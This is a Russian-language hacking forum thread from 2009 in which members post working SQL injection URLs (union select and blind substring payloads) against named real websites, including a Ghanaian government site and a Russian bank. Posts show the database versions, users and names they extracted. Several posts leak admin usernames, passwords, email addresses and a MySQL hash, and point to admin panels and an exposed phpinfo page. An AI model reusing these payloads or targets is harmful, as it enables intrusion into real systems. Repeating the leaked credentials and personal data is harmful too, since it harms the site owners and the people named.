HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9421  
Старый 19.05.2009, 14:25
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
С нами: 8954296

Репутация: 96
По умолчанию

Mysgl


http://nouvelivoire.com/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

3
5.0.67-community



http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

3
5.0.32-Debian_7etch3~bpo31+1-log
--------------------------------------------------------------------------------

10 WIB

5
 
Ответить с цитированием

  #9422  
Старый 19.05.2009, 15:17
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

IP network test & monitoring solutions

PR 3

http://www.shenick.com/show_news.php?id=-87+union+select+1,user(),database(),version(),5,6, 7,8,9+from+user+limit+0,1+--

vesrion() - 5.0.45-log

PASS - 68faf6fe5f3d85c6 mysql hash
Login - выяснить не удалось
//какой-то частичный досутп к information_schema...

Последний раз редактировалось Krist_ALL; 19.05.2009 в 15:20..
 
Ответить с цитированием

  #9423  
Старый 19.05.2009, 15:51
Rav1n
Познающий
Регистрация: 05.11.2008
Сообщений: 92
С нами: 9217595

Репутация: 149
По умолчанию

PHP код:
http://www.digitalfunnies.com/item.php?item_no=-17+union+select+1,2,3,cast(concat_ws(0x3a,version(),database(),user())+as+binary),5,6,7,8,9,10-- 
4.1.16-standard-log:comicscans:comicscans@cyrax.dreamhost.com

==================

PHP код:
http://www.kupi-jeftinije.com/item.php?id=-266+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9-- 
4.1.22-standard-log:kupijeft_kupi:kupijeft_kupi@localhost
 
Ответить с цитированием

  #9424  
Старый 19.05.2009, 17:10
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

http://www.vats.gov.gh/newsdetails.php?ID=-20+union+select+1,username,password,4,5,6+from+use rs+limit+0,1+--


montero -business - kmantey@gmail.com
kwamedankyi -hello2day - kwame.dankyi@vats.gov.gh
оба амдины.
Админки не найдено....

PR 5
 
Ответить с цитированием

  #9425  
Старый 19.05.2009, 17:51
Rednoise
Новичок
Регистрация: 28.03.2007
Сообщений: 29
С нами: 10064404

Репутация: 41
По умолчанию

http://www.seo-cms.ru/news_article.php?id=-2692+union+select+version(),2,user(),4,database(), 6/*

4.1.20-lk-log:skvitrru_seo:skvitrru_seo@localhost

при дальнейшем составлении запроса на выборку из таблиц перекидывает на другой сайт, типа фильтр стоит какой то хз, кому интересно поковыряйте
 
Ответить с цитированием

  #9426  
Старый 19.05.2009, 18:04
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию

http://www.yp.md/news2/news.php?id=-261+union+select+1,2,3,4,version(),6,user(),8,9,10 ,11,12+--

PR 4

user() - ypmd_tester@localhost
version() - 5.0.67-community-log

есть таблица user_info ,но в ней ничего интересного нет....
 
Ответить с цитированием

  #9427  
Старый 19.05.2009, 18:46
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию

http://valdis.org.ru/site.php?id=-2206+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,user(),version(),database()),11,12,13,14,15,16,17

valdis_valdis@localhost:5.0.77-community:valdis_valdis

http://valdis.org.ru/site.php?id=-2206+union+select+1,2,3,4,5,6,7,8,9,TABLE_NAME,11, 12,13,14,15,16,17+from+information_schema.tables+l imit+x,1

в базах ничего интересного не нашел.
PR4, ТИЦ 50

http://www.bank45.ru/site.php?id=-10028+union+select+concat_ws(0x3a,version(),user() ,database())/*

http://www.bank45.ru/site.php?id=-10028+union+select+login+from+users/*

данные выводятся в title

Нашел ещё вот что:
http://www.bank45.ru/users/
особенно понравилось, когда переход по ok.php

так же почерпнуть информацию можно здесь:
http://www.bank45.ru/phpinfo.php

PR2 , ТИЦ 10

Последний раз редактировалось jokester; 19.05.2009 в 19:11.. Причина: Объединяй посты
 
Ответить с цитированием

  #9428  
Старый 19.05.2009, 19:25
savik143
Banned
Регистрация: 18.05.2009
Сообщений: 2
С нами: 8937779

Репутация: -1
По умолчанию

http://www.shenick.com/show_news.php?id=-87+union+select+1,user(),database(),version(),5,6, 7,8,9+from+user+limit+0,1+--

vesrion() - 5.0.45-log доступ нормальный логин admin,админка по адресу /admin

Последний раз редактировалось savik143; 19.05.2009 в 19:29..
 
Ответить с цитированием

  #9429  
Старый 19.05.2009, 20:42
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

http://www.massiveattack.com/blog.php?id=-657%20union%20select%201,2,3,4,5,6,CONCAT_WS(7,%20 user(),%20version(),%20database()),8,9.10,11,12,13 ,14,15,16,17,18,19,20,21%20/*
 
Ответить с цитированием

  #9430  
Старый 19.05.2009, 21:14
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию

[PR 6]
Код:
http://perkins.pvt.k12.ma.us/museum/area.php?id=35+and+substring(@@version,1,1)=3
[PR 4]
Код:
http://www.unitech-adc.us/product_info.php?id=41+and+substring(@@version,1,1)=3
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.